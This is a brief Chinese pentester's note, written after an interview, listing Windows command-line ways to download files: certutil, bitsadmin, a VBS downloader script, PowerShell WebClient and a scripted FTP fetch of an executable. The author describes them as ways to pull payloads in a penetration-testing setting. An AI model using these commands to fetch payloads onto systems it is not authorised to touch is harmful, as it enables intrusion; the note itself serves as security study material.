今天渗透测试面试提到cmd下载文件 ,自己只写了js和certutil,还有几种常见的方法自己没想起来 这里记录和总结下 。
(自己还是太菜太垃圾。)
0x01 certutil
certutil 是一个证书工具,功能挺丰富的,参数非常多
certutil -urlcache -split -f http://xxxxxx certutil -urlcache -split -f https://xxxxxx 1.txt #指定保存文件名
0x02 bitsadmin
bitsadmin /transfer n http://www.xx.com/index.txt K:\111.txt
0x03 vbs
这里vbs下载用到代码:
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
利用csript:执行脚本文件
K:\>cscript .vbs http://xxxxxx/index.txt 111.txt
0x04 powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/index.txt','K:\111.txt')
0x05 ftp
echo open 8.8.8.8 >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt ftp -A -s:a.txt
今天出去喝了点酒 还有几种渗透环境中下载payload的方式 先睡了。。